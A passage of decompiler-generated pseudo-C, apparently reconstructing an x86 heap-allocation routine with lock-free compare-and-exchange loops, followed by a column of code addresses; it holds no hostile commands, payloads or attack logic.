							 *(_t765 - 0x30) = _t345;
							__eflags = _t345;
							if(_t345 == 0) {
								goto L75;
							}
							L60:
							 *(_t765 - 4) = 1;
							while(1) {
								_t577 = _t345 + 8;
								_t659 =  *_t577;
								 *(_t765 - 0x5c) = _t659;
								_t709 = _t577[1];
								 *(_t765 - 0x58) = _t709;
								__eflags = _t659;
								if(_t659 == 0) {
									break;
								}
								_t752 =  *(_t345 + 4);
								__eflags = _t752;
								if(_t752 == 0) {
									break;
								}
								__eflags =  *_t345 - _t517;
								if( *_t345 != _t517) {
									break;
								}
								_t753 = (_t659 >> 0x0000000d & 0x0007fff8) + _t752 + 8;
								asm("adc edi, 0xffffffff");
								_t478 =  *_t753 & 0x0000ffff;
								asm("cdq");
								 *(_t765 - 0x74) = _t659 + 0xffffffff & 0x0000ffff | _t478 << 0x00000010;
								 *(_t765 - 0x70) = _t709 | (_t659 << 0x00000020 | _t478) << 0x10;
								_t670 =  *(_t765 - 0x58);
								asm("lock cmpxchg8b [edi]");
								__eflags =  *(_t765 - 0x5c) -  *(_t765 - 0x5c);
								if( *(_t765 - 0x5c) !=  *(_t765 - 0x5c)) {
									L163:
									_t517 =  *(_t765 - 0x20);
									_t483 = ( *(_t517 + 0x60) & 0x0000ffff) << 2;
									_t582 =  *((intOrPtr*)( *((intOrPtr*)(_t517 + 0x58)) + 0xc));
									__eflags =  *(_t582 + _t483 + 0x113) & 0x00000001;
									if(( *(_t582 + _t483 + 0x113) & 0x00000001) == 0) {
										_t257 = (( *(_t517 + 0x60) & 0x0000ffff) << 2) + 0x113; // 0x7d811074
										_t487 =  *((intOrPtr*)( *((intOrPtr*)(_t517 + 0x58)) + 0xc)) + _t257;
										 *_t487 =  *_t487 | 0x00000001;
										__eflags =  *_t487;
									}
									_t345 =  *(_t765 - 0x30);
									continue;
								}
								__eflags = _t670 -  *(_t765 - 0x58);
								if(_t670 !=  *(_t765 - 0x58)) {
									goto L163;
								}
								_t578 = _t753;
								L67:
								 *(_t765 - 0x24) = _t578;
								 *(_t765 - 4) = 0xfffffffe;
								__eflags = _t578;
								if(_t578 == 0) {
									goto L75;
								}
								_t472 = (( *( *(_t765 - 0x28)) & 0x0000ffff) << 3) -  *((intOrPtr*)(_t765 - 0x3c));
								_t579 = _t578 + 0xfffffff8;
								_t751 =  *( *(_t765 - 0x2c) + 0x24);
								__eflags = _t472 - 0x3f;
								if(_t472 < 0x3f) {
									L12:
									 *(_t579 + 7) = _t472 | 0x00000080;
									L13:
									_t411 =  *(_t765 - 0x24);
									L14:
									return E008FDFA1(_t411);
								}
								__eflags =  *(_t579 + 7) & 0x00000080;
								if(( *(_t579 + 7) & 0x00000080) == 0) {
									__eflags =  *(_t751 + 0x4c);
									if( *(_t751 + 0x4c) == 0) {
										L182:
										_t661 =  *_t579 & 0x0000ffff;
										L71:
										 *(_t579 + 7) = 0xbf;
										 *(_t579 + (_t661 & 0x0000ffff) * 8 - 4) = _t472;
										goto L13;
									}
									_t663 =  *_t579;
									__eflags =  *(_t751 + 0x4c) & _t663;
									L179:
									if(__eflags != 0) {
										_t663 = _t663 ^  *(_t751 + 0x50);
										__eflags = _t663;
									}
									_t661 = _t663 & 0x0000ffff;
									goto L71;
								}
								L70:
								_t668 = _t579 >> 0x00000003 ^  *_t579 ^ _t751 ^  *0x9d00a4;
								__eflags = _t668;
								_t661 =  *((intOrPtr*)(_t668 + 0x10));
								goto L71;
							}
							_t578 = 0;
							goto L67;
							L75:
							_t348 = (( *(_t765 - 0x28))[1] & 0x000000ff) * 0x68;
							__eflags = _t348;
							_t748 =  *(_t765 - 0x44) + _t348 + 0x18;
							while(1) {
								_t706 = 0;
								_t654 = 0;
								_t566 = _t748 + 8;
								 *(_t765 - 0x40) = 0x10;
								do {
									L19:
									_t349 =  *_t566;
									__eflags = _t349;
									if(_t349 != 0) {
										_t518 =  *(_t349 + 8) & 0x0000ffff;
										 *(_t765 - 0x30) = _t518;
										__eflags = _t518 - _t654;
										if(_t518 > _t654) {
											 *(_t765 - 0x38) = _t349;
											_t654 = _t518;
											_t706 = _t566;
										}
									}
									_t566 = _t566 + 4;
									_t57 = _t765 - 0x40;
									 *_t57 =  *(_t765 - 0x40) - 1;
									__eflags =  *_t57;
								} while ( *_t57 != 0);
								 *(_t765 - 0x30) = _t706;
								__eflags = _t706;
								if(_t706 != 0) {
									_t350 = E009026F8(_t748 + 0x48, _t654);
									while(1) {
										_t655 = _t350;
										__eflags = _t655;
										if(_t655 == 0) {
											break;
										}
										_t655 = _t655 - 0x18;
										_t351 = _t655 + 0x1c;
										_t568 =  *_t351;
										__eflags = _t568 & 0x00000001;
										if((_t568 & 0x00000001) != 0) {
											break;
										}
										_t632 = 0xfffffffd;
										_t466 =  *_t351;
										do {
											__eflags = _t466 & _t632;
											asm("lock cmpxchg [edi], ebx");
										} while ((_t466 & _t632) != 0);
										__eflags = _t466 - 2;
										if(_t466 == 2) {
											_t467 =  *_t655;
											 *_t655 =  *_t655 & 0x00000000;
											 *((intOrPtr*)(_t655 + 0xc)) =  *((intOrPtr*)(_t655 + 0xc)) + 1;
											__eflags = _t655;
											E00902774( *((intOrPtr*)(_t467 + 0x58)), _t655);
										}
										_t350 = E009026F8(_t748 + 0x48, _t655);
										_t706 =  *(_t765 - 0x30);
									}
									asm("lock cmpxchg [ebx], ecx");
									__eflags =  *(_t765 - 0x38) -  *(_t765 - 0x38);
									if( *(_t765 - 0x38) !=  *(_t765 - 0x38)) {
										__eflags = _t655;
										if(_t655 != 0) {
											E00902774(_t748 + 0x48, _t655 + 0x18);
										}
										_t706 = 0;
										_t654 = 0;
										_t566 = _t748 + 8;
										 *(_t765 - 0x40) = 0x10;
										goto L19;
									}
									__eflags = _t655;
									if(_t655 == 0) {
										_t737 = _t706 - _t748 - 8;
										__eflags = _t737;
										 *((short*)(_t748 + 0x62)) = _t737 >> 2;
									}
									_t657 =  *(_t765 - 0x38);
									L23:
									__eflags = _t657;
									if(_t657 != 0) {
										_t571 = 0xfffffffd;
										_t354 =  *(_t657 + 0x1c);
										do {
											__eflags = _t354 & _t571;
											asm("lock cmpxchg [edi], ebx");
										} while ((_t354 & _t571) != 0);
										__eflags = _t354 - 2;
										if(_t354 == 2) {
											_t355 =  *_t657;
											 *_t657 =  *_t657 & 0x00000000;
											 *((intOrPtr*)(_t657 + 0xc)) =  *((intOrPtr*)(_t657 + 0xc)) + 1;
											E00902774( *((intOrPtr*)(_t355 + 0x58)), _t657);
											goto L24;
										}
										L77:
										_t750 = _t657;
										L27:
										__eflags = _t750;
										if(_t750 != 0) {
											_t658 = _t750 + 0x1c;
											while(1) {
												_t576 =  *_t658;
												__eflags = _t576;
												if(_t576 == 0) {
													break;
												}
												__eflags = _t576 & 0x00000006;
												if((_t576 & 0x00000006) != 0) {
													break;
												}
												asm("lock cmpxchg [ebx], edi");
												__eflags = _t576 - _t576;
												if(_t576 != _t576) {
													continue;
												}
												_t361 = 1;
												L83:
												__eflags = _t361;
												if(_t361 == 0) {
													goto L59;
													do {
														while(1) {
															L59:
															_t517 =  *(_t765 - 0x20);
															_t345 =  *(_t517 + 4);
															 *(_t765 - 0x30) = _t345;
															__eflags = _t345;
															if(_t345 == 0) {
																goto L75;
															}
															goto L60;
														}
														L146:
														__eflags = _t371 - 2;
													} while (_t371 != 2);
													_t589 =  *( *_t671 + 0x58);
													 *_t671 =  *_t671 & 0x00000000;
													 *((intOrPtr*)(_t671 + 0xc)) =  *((intOrPtr*)(_t671 + 0xc)) + 1;
													_t672 = _t671 + 0x18;
													L125:
													E00902774(_t589, _t672);
													goto L59;
													do {
														while(1) {
															L59:
															_t517 =  *(_t765 - 0x20);
															_t345 =  *(_t517 + 4);
															 *(_t765 - 0x30) = _t345;
															__eflags = _t345;
															if(_t345 == 0) {
																goto L75;
															}
															goto L60;
														}
														L238:
														__eflags = _t427;
													} while (_t427 == 0);
													_t726 =  *_t750;
													_t322 = _t765 - 0x30;
													 *_t322 =  *(_t765 - 0x30) & 0x00000000;
													__eflags =  *_t322;
													while(1) {
														_t671 =  *(_t726 + 8 + (( *(_t726 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
														__eflags = _t671;
														if(_t671 != 0) {
															goto L243;
														}
														L241:
														asm("lock cmpxchg [edx], ecx");
														__eflags = 0;
														if(0 != 0) {
															L245:
															 *(_t765 - 0x30) =  *(_t765 - 0x30) + 1;
															__eflags =  *(_t765 - 0x30) - 0x10;
															if( *(_t765 - 0x30) >= 0x10) {
																L123:
																_t589 =  *_t750 + 0x48;
																__eflags =  *_t750 + 0x48;
																L124:
																_t672 = _t750 + 0x18;
																goto L125;
															}
															_t671 =  *(_t726 + 8 + (( *(_t726 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
															__eflags = _t671;
															if(_t671 != 0) {
																goto L243;
															}
															goto L241;
														}
														goto L59;
														do {
															while(1) {
																L59:
																_t517 =  *(_t765 - 0x20);
																_t345 =  *(_t517 + 4);
																 *(_t765 - 0x30) = _t345;
																__eflags = _t345;
																if(_t345 == 0) {
																	goto L75;
																}
																goto L60;
															}
															L118:
															__eflags = _t453;
														} while (_t453 == 0);
														_t733 =  *_t750;
														_t182 = _t765 - 0x30;
														 *_t182 =  *(_t765 - 0x30) & 0x00000000;
														__eflags =  *_t182;
														do {
															_t671 =  *(_t733 + 8 + (( *(_t733 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
															__eflags = _t671;
															if(_t671 != 0) {
																L142:
																_t628 =  *(_t671 + 0x1c);
																__eflags = _t628 & 0x00000001;
																if((_t628 & 0x00000001) != 0) {
																	goto L122;
																}
																asm("lock cmpxchg [ebx], ecx");
																__eflags = _t671 - _t671;
																if(_t671 != _t671) {
																	goto L122;
																}
																L144:
																_t592 = 0xfffffffd;
																_t371 =  *(_t671 + 0x1c);
																do {
																	__eflags = _t371 & _t592;
																	asm("lock cmpxchg [esi], edi");
																} while ((_t371 & _t592) != 0);
																goto L146;
															}
															asm("lock cmpxchg [edx], ecx");
															__eflags = 0;
															if(0 == 0) {
																while(1) {
																	L59:
																	_t517 =  *(_t765 - 0x20);
																	_t345 =  *(_t517 + 4);
																	 *(_t765 - 0x30) = _t345;
																	__eflags = _t345;
																	if(_t345 == 0) {
																		goto L75;
																	}
																	goto L60;
																}
															}
															L122:
															 *(_t765 - 0x30) =  *(_t765 - 0x30) + 1;
															__eflags =  *(_t765 - 0x30) - 0x10;
														} while ( *(_t765 - 0x30) < 0x10);
														goto L123;
														L243:
														_t618 =  *(_t671 + 0x1c);
														__eflags = _t618 & 0x00000001;
														if((_t618 & 0x00000001) != 0) {
															goto L245;
														}
														asm("lock cmpxchg [ebx], ecx");
														__eflags = _t671 - _t671;
														if(_t671 == _t671) {
															goto L144;
														}
														goto L245;
													}
												}
												L84:
												_t362 =  *(_t765 - 0x20);
												__eflags =  *_t750 - _t362;
												if( *_t750 != _t362) {
													_t585 = 0xfffffff9;
													_t363 =  *_t658;
													do {
														__eflags = _t363 & _t585;
														asm("lock cmpxchg [edi], ebx");
													} while ((_t363 & _t585) != 0);
													__eflags = _t363 - 6;
													if(_t363 != 6) {
														L190:
														__eflags =  *((short*)(_t750 + 8));
														if( *((short*)(_t750 + 8)) == 0) {
															goto L59;
															do {
																do {
																	do {
																		do {
																			do {
																				do {
																					do {
																						do {
																							L59:
																							_t517 =  *(_t765 - 0x20);
																							_t345 =  *(_t517 + 4);
																							 *(_t765 - 0x30) = _t345;
																							__eflags = _t345;
																							if(_t345 == 0) {
																								goto L75;
																							}
																							goto L60;
																						} while (_t361 == 0);
																						goto L84;
																					} while (_t750 == 0);
																					_t593 = _t750 + 0x1c;
																					_t674 = 0xfffffff9;
																					_t379 =  *_t593;
																					do {
																						__eflags = _t379 & _t674;
																						asm("lock cmpxchg [edi], ebx");
																					} while ((_t379 & _t674) != 0);
																					__eflags = _t379 - 6;
																					if(_t379 == 6) {
																						goto L189;
																					}
																					goto L89;
																				} while ( *((short*)(_t750 + 8)) == 0);
																				while(1) {
																					L191:
																					_t586 =  *_t658;
																					__eflags = _t586;
																					if(_t586 == 0) {
																						break;
																					}
																					__eflags = _t586 & 0x00000002;
																					if((_t586 & 0x00000002) != 0) {
																						break;
																					}
																					asm("lock cmpxchg [ebx], edi");
																					__eflags = _t586 - _t586;
																					if(_t586 != _t586) {
																						continue;
																					}
																					_t364 = 1;
																					goto L196;
																				}
																				_t364 = 0;
																				__eflags = 0;
																				goto L196;
																				L89:
																				__eflags =  *((short*)(_t750 + 8));
																			} while ( *((short*)(_t750 + 8)) == 0);
																			while(1) {
																				_t675 =  *_t593;
																				__eflags = _t675;
																				if(_t675 == 0) {
																					break;
																				}
																				__eflags = _t675 & 0x00000002;
																				if((_t675 & 0x00000002) != 0) {
																					break;
																				}
																				asm("lock cmpxchg [ebx], edi");
																				__eflags = _t675 - _t675;
																				if(_t675 != _t675) {
																					continue;
																				}
																				_t380 = 1;
																				goto L94;
																			}
																			_t380 = 0;
																			goto L94;
																			L196:
																			__eflags = _t364;
																		} while (_t364 == 0);
																		_t714 =  *_t750;
																		_t282 = _t765 - 0x30;
																		 *_t282 =  *(_t765 - 0x30) & 0x00000000;
																		__eflags =  *_t282;
																		while(1) {
																			_t671 =  *(_t714 + 8 + (( *(_t714 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
																			__eflags = _t671;
																			if(_t671 != 0) {
																				goto L201;
																			}
																			L199:
																			asm("lock cmpxchg [edx], ecx");
																			__eflags = 0;
																			if(0 != 0) {
																				L203:
																				 *(_t765 - 0x30) =  *(_t765 - 0x30) + 1;
																				__eflags =  *(_t765 - 0x30) - 0x10;
																				if( *(_t765 - 0x30) >= 0x10) {
																					goto L123;
																				}
																				_t671 =  *(_t714 + 8 + (( *(_t714 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
																				__eflags = _t671;
																				if(_t671 != 0) {
																					goto L201;
																				}
																				goto L199;
																			}
																			goto L59;
																			L201:
																			_t587 =  *(_t671 + 0x1c);
																			__eflags = _t587 & 0x00000001;
																			if((_t587 & 0x00000001) != 0) {
																				goto L203;
																			}
																			asm("lock cmpxchg [ebx], ecx");
																			__eflags = _t671 - _t671;
																			if(_t671 == _t671) {
																				goto L144;
																			}
																			goto L203;
																		}
																		L94:
																		__eflags = _t380;
																	} while (_t380 == 0);
																	_t719 =  *_t750;
																	_t162 = _t765 - 0x30;
																	 *_t162 =  *(_t765 - 0x30) & 0x00000000;
																	__eflags =  *_t162;
																	do {
																		_t671 =  *(_t719 + 8 + (( *(_t719 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
																		__eflags = _t671;
																		if(_t671 != 0) {
																			_t594 =  *(_t671 + 0x1c);
																			__eflags = _t594 & 0x00000001;
																			if((_t594 & 0x00000001) != 0) {
																				goto L98;
																			}
																			asm("lock cmpxchg [ebx], ecx");
																			__eflags = _t671 - _t671;
																			if(_t671 == _t671) {
																				goto L144;
																			}
																			goto L98;
																		}
																		asm("lock cmpxchg [edx], ecx");
																		__eflags = 0;
																		if(0 == 0) {
																			goto L59;
																		}
																		L98:
																		 *(_t765 - 0x30) =  *(_t765 - 0x30) + 1;
																		__eflags =  *(_t765 - 0x30) - 0x10;
																	} while ( *(_t765 - 0x30) < 0x10);
																	goto L123;
																	L58:
																	_t451 = _t435 + 4;
																	_t108 = _t750;
																	_t750 =  *_t451;
																	 *_t451 = _t108;
																	__eflags = _t750;
																} while (_t750 == 0);
																_t627 = _t750 + 0x1c;
																_t691 = 0xfffffff9;
																_t452 =  *_t627;
																do {
																	__eflags = _t452 & _t691;
																	asm("lock cmpxchg [edi], ebx");
																} while ((_t452 & _t691) != 0);
																__eflags = _t452 - 6;
																if(_t452 == 6) {
																	goto L189;
																}
																__eflags =  *((short*)(_t750 + 8));
															} while ( *((short*)(_t750 + 8)) == 0);
															while(1) {
																_t692 =  *_t627;
																__eflags = _t692;
																if(_t692 == 0) {
																	break;
																}
																__eflags = _t692 & 0x00000002;
																if((_t692 & 0x00000002) != 0) {
																	break;
																}
																asm("lock cmpxchg [ebx], edi");
																__eflags = _t692 - _t692;
																if(_t692 != _t692) {
																	continue;
																}
																_t453 = 1;
																goto L118;
															}
															_t453 = 0;
															goto L118;
														}
														goto L191;
													}
													L189:
													_t589 =  *( *_t750 + 0x58);
													 *_t750 =  *_t750 & 0x00000000;
													 *((intOrPtr*)(_t750 + 0xc)) =  *((intOrPtr*)(_t750 + 0xc)) + 1;
													goto L124;
												}
												_t378 = _t362 + 4;
												_t157 = _t750;
												_t750 =  *_t378;
												 *_t378 = _t157;
												__eflags = _t750;
											}
											_t361 = 0;
											goto L83;
										}
										_t394 = ( *(_t765 - 0x28))[1] & 0x000000ff;
										 *(_t765 - 0x40) = _t394;
										_t756 =  *(_t765 - 0x2c) + 0x48;
										__eflags = _t756;
										while(1) {
											 *((char*)(_t765 - 0x19)) = 0;
											 *(_t765 - 0x54) =  *_t756;
											 *(_t765 - 0x50) =  *(_t756 + 4);
											__eflags =  *(_t765 - 0x54) - _t394;
											if( *(_t765 - 0x54) == _t394) {
												 *(_t765 - 0x60) =  *(_t765 - 0x50) + 1;
												__eflags =  *(_t765 - 0x50) - 7;
												if( *(_t765 - 0x50) > 7) {
													 *((char*)(_t765 - 0x19)) = 1;
													 *(_t765 - 0x60) = 0;
												}
											} else {
												 *(_t765 - 0x64) = _t394;
												 *(_t765 - 0x60) = 1;
											}
											_t677 =  *(_t765 - 0x50);
											asm("lock cmpxchg8b [edi]");
											_t723 =  *(_t765 - 0x50);
											__eflags =  *(_t765 - 0x54) -  *(_t765 - 0x54);
											if( *(_t765 - 0x54) !=  *(_t765 - 0x54)) {
												goto L170;
											}
											L32:
											__eflags = _t677 - _t723;
											if(_t677 != _t723) {
												goto L170;
											}
											_t678 =  *( *(_t765 - 0x20) + 0x50);
											__eflags =  *((char*)(_t765 - 0x19));
											if( *((char*)(_t765 - 0x19)) == 0) {
												_t678 = _t678 >> 4;
												__eflags = _t678;
											}
											_t602 =  *(_t765 - 0x28);
											_t536 = _t602[1];
											_t401 = _t536 & 0x00000001;
											_t757 =  *((intOrPtr*)(0x9079c0 + (_t602[1] & 0x000000ff) * 4));
											_t724 = 7;
											__eflags = _t757 - 0x100;
											if(_t757 < 0x100) {
												_t401 = _t401 - 1;
												__eflags = _t401;
											}
											__eflags =  *0x9d02f4 -  *0x9d00a0 >> 1;
											if( *0x9d02f4 >  *0x9d00a0 >> 1) {
												_t401 = _t401 + 1;
											}
											_t606 = 4;
											_t405 = 1 << _t606 - _t401;
											__eflags = _t678 - 1;
											if(_t678 < 1) {
												_t678 = _t405;
											}
											__eflags = _t678 - 0x400;
											if(_t678 > 0x400) {
												_t678 = 0x400;
											}
											_t409 = (_t757 + 8) * _t678 + 0x18;
											__eflags = _t409 - 0x78000;
											if(_t409 > 0x78000) {
												_t409 = 0x78000;
											}
											__eflags = _t409 & 0xffffff80;
											if((_t409 & 0xffffff80) == 0) {
												L44:
												__eflags = _t724 - 0x12;
												if(_t724 > 0x12) {
													_t724 = 0x12;
												}
												_t679 = _t724;
												__eflags = _t536 & 0x00000006;
												if(__eflags != 0) {
													_t679 = 0x12;
												}
												_push(_t757 + 8);
												_t537 =  *(_t765 - 0x2c);
												_t725 = L00907BC5(_t537, _t537, _t679, _t724, _t757 + 8, __eflags);
												__eflags = _t725;
												if(_t725 == 0) {
													L173:
													_t411 = 0;
													goto L14;
												} else {
													_t415 = 1 <<  *(_t725 + 8);
													__eflags = 1 - 0x78000;
													if(1 > 0x78000) {
														_t415 = 0x78000;
													}
													 *(_t765 - 0x40) = _t415 + 0xfffffff8;
													asm("lock xadd [eax], ecx");
													_t614 =  *(_t765 - 0x44);
													_t418 = E009026F8( *(_t765 - 0x44), _t679);
													__eflags = _t418;
													if(_t418 == 0) {
														_t614 = _t537;
														_t750 = E00907F71(_t537,  *(_t765 - 0x34));
														__eflags = _t750;
														if(_t750 == 0) {
															goto L247;
														}
														 *(_t750 + 4) =  *(_t750 + 4) & 0x00000000;
														goto L50;
													} else {
														_t750 = _t418 - 0x18;
														L50:
														__eflags = _t750;
														if(_t750 == 0) {
															L247:
															E008FE025(_t614,  *((intOrPtr*)(_t537 + 0x24)), 0, _t725);
															goto L173;
														}
														 *((char*)(_t750 + 0x17)) =  *(_t765 - 0x34);
														E00907C4D(_t537, _t750, _t725,  *((intOrPtr*)(0x9079c0 + (( *(_t765 - 0x28))[1] & 0x000000ff) * 4)),  *(_t765 - 0x40),  *(_t765 - 0x28));
														 *((intOrPtr*)(_t725 + 0xc)) = 0xf0e0d0c0;
														_t616 = _t750 + 0x1c;
														while(1) {
															_t682 =  *_t616;
															__eflags = _t682;
															if(_t682 == 0) {
																break;
															}
															__eflags = _t682 & 0x00000006;
															if((_t682 & 0x00000006) != 0) {
																break;
															}
															asm("lock cmpxchg [ebx], edi");
															__eflags = _t682 - _t682;
															if(_t682 != _t682) {
																continue;
															}
															_t425 = 1;
															L56:
															__eflags = _t425;
															if(_t425 == 0) {
																while(1) {
																	L223:
																	_t617 =  *(_t750 + 0x1c);
																	__eflags = _t617;
																	if(_t617 == 0) {
																		break;
																	}
																	__eflags = _t617 & 0x00000002;
																	if((_t617 & 0x00000002) != 0) {
																		break;
																	}
																	asm("lock cmpxchg [edi], edx");
																	__eflags = _t617 - _t617;
																	if(_t617 != _t617) {
																		continue;
																	}
																	_t427 = 1;
																	goto L238;
																}
																_t427 = 0;
																__eflags = 0;
																goto L238;
															}
															_t435 =  *(_t765 - 0x20);
															__eflags =  *_t750 - _t435;
															if( *_t750 != _t435) {
																_t686 = 0xfffffff9;
																_t436 =  *_t616;
																do {
																	__eflags = _t436 & _t686;
																	asm("lock cmpxchg [edi], ebx");
																} while ((_t436 & _t686) != 0);
																__eflags = _t436 - 6;
																if(_t436 != 6) {
																	__eflags =  *((short*)(_t750 + 8));
																	if( *((short*)(_t750 + 8)) == 0) {
																		goto L223;
																	} else {
																		goto L214;
																	}
																	while(1) {
																		L214:
																		_t687 =  *_t616;
																		__eflags = _t687;
																		if(_t687 == 0) {
																			break;
																		}
																		__eflags = _t687 & 0x00000002;
																		if((_t687 & 0x00000002) != 0) {
																			break;
																		}
																		asm("lock cmpxchg [ebx], edi");
																		__eflags = _t687 - _t687;
																		if(_t687 != _t687) {
																			continue;
																		}
																		_t437 = 1;
																		L219:
																		__eflags = _t437;
																		if(_t437 == 0) {
																			goto L223;
																		}
																		_t729 =  *_t750;
																		_t301 = _t765 - 0x30;
																		 *_t301 =  *(_t765 - 0x30) & 0x00000000;
																		__eflags =  *_t301;
																		do {
																			_t688 =  *(_t729 + 8 + (( *(_t729 + 0x62) & 0x0000ffff) +  *(_t765 - 0x30) & 0x0000000f) * 4);
																			__eflags = _t688;
																			if(_t688 != 0) {
																				_t621 =  *(_t688 + 0x1c);
																				__eflags = _t621 & 0x00000001;
																				if((_t621 & 0x00000001) != 0) {
																					goto L229;
																				}
																				asm("lock cmpxchg [ebx], ecx");
																				__eflags = _t688 - _t688;
																				if(_t688 == _t688) {
																					_t626 = 0xfffffffd;
																					_t444 =  *(_t688 + 0x1c);
																					do {
																						__eflags = _t444 & _t626;
																						asm("lock cmpxchg [edi], ebx");
																					} while ((_t444 & _t626) != 0);
																					__eflags = _t444 - 2;
																					if(_t444 != 2) {
																						goto L223;
																					}
																					_t624 =  *( *_t688 + 0x58);
																					 *_t688 =  *_t688 & 0x00000000;
																					 *((intOrPtr*)(_t688 + 0xc)) =  *((intOrPtr*)(_t688 + 0xc)) + 1;
																					_t689 = _t688 + 0x18;
																					L232:
																					E00902774(_t624, _t689);
																					goto L223;
																				}
																				goto L229;
																			}
																			asm("lock cmpxchg [edx], ecx");
																			__eflags = 0;
																			if(0 != 0) {
																				goto L229;
																			}
																			goto L223;
																			L229:
																			 *(_t765 - 0x30) =  *(_t765 - 0x30) + 1;
																			__eflags =  *(_t765 - 0x30) - 0x10;
																		} while ( *(_t765 - 0x30) < 0x10);
																		_t624 =  *_t750 + 0x48;
																		__eflags =  *_t750 + 0x48;
																		L231:
																		_t689 = _t750 + 0x18;
																		goto L232;
																	}
																	_t437 = 0;
																	__eflags = 0;
																	goto L219;
																}
																_t624 =  *( *_t750 + 0x58);
																 *_t750 =  *_t750 & 0x00000000;
																 *((intOrPtr*)(_t750 + 0xc)) =  *((intOrPtr*)(_t750 + 0xc)) + 1;
																goto L231;
															}
															goto L58;
														}
														_t425 = 0;
														goto L56;
													}
												}
											} else {
												do {
													_t724 = _t724 + 1;
													__eflags = _t409 >> _t724;
												} while (_t409 >> _t724 != 0);
												goto L44;
											}
											L170:
											_t394 =  *(_t765 - 0x40);
											 *((char*)(_t765 - 0x19)) = 0;
											 *(_t765 - 0x54) =  *_t756;
											 *(_t765 - 0x50) =  *(_t756 + 4);
											__eflags =  *(_t765 - 0x54) - _t394;
											if( *(_t765 - 0x54) == _t394) {
												 *(_t765 - 0x60) =  *(_t765 - 0x50) + 1;
												__eflags =  *(_t765 - 0x50) - 7;
												if( *(_t765 - 0x50) > 7) {
													 *((char*)(_t765 - 0x19)) = 1;
													 *(_t765 - 0x60) = 0;
												}
											} else {
												 *(_t765 - 0x64) = _t394;
												 *(_t765 - 0x60) = 1;
											}
											_t677 =  *(_t765 - 0x50);
											asm("lock cmpxchg8b [edi]");
											_t723 =  *(_t765 - 0x50);
											__eflags =  *(_t765 - 0x54) -  *(_t765 - 0x54);
											if( *(_t765 - 0x54) !=  *(_t765 - 0x54)) {
												goto L170;
											}
										}
									}
									L24:
									_t749 = _t748 + 0x48;
									__eflags = _t748 + 0x48;
									while(1) {
										_t357 = E009026F8(_t749, _t657);
										__eflags = _t357;
										if(_t357 == 0) {
											break;
										}
										_t657 = _t357 - 0x18;
										_t574 = 0xfffffffd;
										_t358 =  *(_t657 + 0x1c);
										do {
											__eflags = _t358 & _t574;
											asm("lock cmpxchg [edi], ebx");
										} while ((_t358 & _t574) != 0);
										__eflags = _t358 - 2;
										if(_t358 == 2) {
											_t359 =  *_t657;
											 *_t657 =  *_t657 & 0x00000000;
											 *((intOrPtr*)(_t657 + 0xc)) =  *((intOrPtr*)(_t657 + 0xc)) + 1;
											E00902774( *((intOrPtr*)(_t359 + 0x58)), _t657);
											continue;
										}
										__eflags =  *((short*)(_t657 + 8));
										if( *((short*)(_t657 + 8)) == 0) {
											continue;
										}
										goto L77;
									}
									_t750 = 0;
									__eflags = 0;
									goto L27;
								}
								_t657 = 0;
								__eflags = 0;
								goto L23;
							}
						}
					}
					 *(_t765 - 4) =  *(_t765 - 4) & 0x00000000;
					while(1) {
						_t635 = _t344 + 8;
						_t740 =  *_t635;
						 *(_t765 - 0x54) = _t740;
						_t555 = _t635[1];
						 *(_t765 - 0x50) = _t555;
						if(_t740 == 0) {
							break;
						}
						_t759 =  *((intOrPtr*)(_t344 + 4));
						if(_t759 == 0 ||  *_t344 != _t653) {
							break;
						} else {
							_t28 = (_t740 >> 0x0000000d & 0x0007fff8) + _t759 + 8; // 0x8
							_t760 = _t28;
							asm("adc ebx, 0xffffffff");
							_t496 =  *_t760 & 0x0000ffff;
							asm("cdq");
							 *(_t765 - 0x6c) = _t740 + 0xffffffff & 0x0000ffff | _t496 << 0x00000010;
							 *(_t765 - 0x68) = _t555 | (_t653 << 0x00000020 | _t496) << 0x10;
							_t698 =  *(_t765 - 0x50);
							asm("lock cmpxchg8b [edi]");
							if( *(_t765 - 0x54) !=  *(_t765 - 0x54) || _t698 !=  *(_t765 - 0x50)) {
								_t653 =  *(_t765 - 0x20);
								_t501 = ( *(_t653 + 0x60) & 0x0000ffff) << 2;
								_t639 =  *((intOrPtr*)( *((intOrPtr*)(_t653 + 0x58)) + 0xc));
								__eflags =  *(_t639 + _t501 + 0x113) & 0x00000001;
								if(( *(_t639 + _t501 + 0x113) & 0x00000001) == 0) {
									_t243 = (( *(_t653 + 0x60) & 0x0000ffff) << 2) + 0x113; // 0x7d811074
									_t505 =  *((intOrPtr*)( *((intOrPtr*)(_t653 + 0x58)) + 0xc)) + _t243;
									 *_t505 =  *_t505 | 0x00000001;
									__eflags =  *_t505;
								}
								_t344 =  *(_t765 - 0x30);
								continue;
							} else {
								_t636 = _t760;
								L10:
								 *(_t765 - 0x24) = _t636;
								 *(_t765 - 4) = 0xfffffffe;
								if(_t636 == 0) {
									 *( *(_t765 - 0x20)) =  *( *(_t765 - 0x20)) & 0x00000000;
									goto L59;
								}
								_t472 = (( *( *(_t765 - 0x28)) & 0x0000ffff) << 3) -  *((intOrPtr*)(_t765 - 0x3c));
								_t579 = _t636 + 0xfffffff8;
								_t751 =  *( *(_t765 - 0x2c) + 0x24);
								if(_t472 >= 0x3f) {
									__eflags =  *(_t579 + 7) & 0x00000080;
									if(( *(_t579 + 7) & 0x00000080) != 0) {
										goto L70;
									}
									__eflags =  *(_t751 + 0x4c);
									if( *(_t751 + 0x4c) == 0) {
										goto L182;
									} else {
										_t663 =  *_t579;
										__eflags =  *(_t751 + 0x4c) & _t663;
										goto L179;
									}
									goto L142;
								}
								goto L12;
							}
						}
					}
					_t636 = 0;
					goto L10;
				}
			}










































































































































                                                0x008fe2e9
                                                0x008fe2eb
                                                0x008fe2f0
                                                0x008fe2f5
                                                0x008fe2f8
                                                0x008fe2fa
                                                0x008fe30a
                                                0x008fe30c
                                                0x008fe313
                                                0x00935135
                                                0x00935135
                                                0x00935136
                                                0x00935139
                                                0x00935549
                                                0x00935553
                                                0x00935449
                                                0x00935449
                                                0x0093544e
                                                0x00935455
                                                0x00935455
                                                0x00935458
                                                0x0093545e
                                                0x00935468
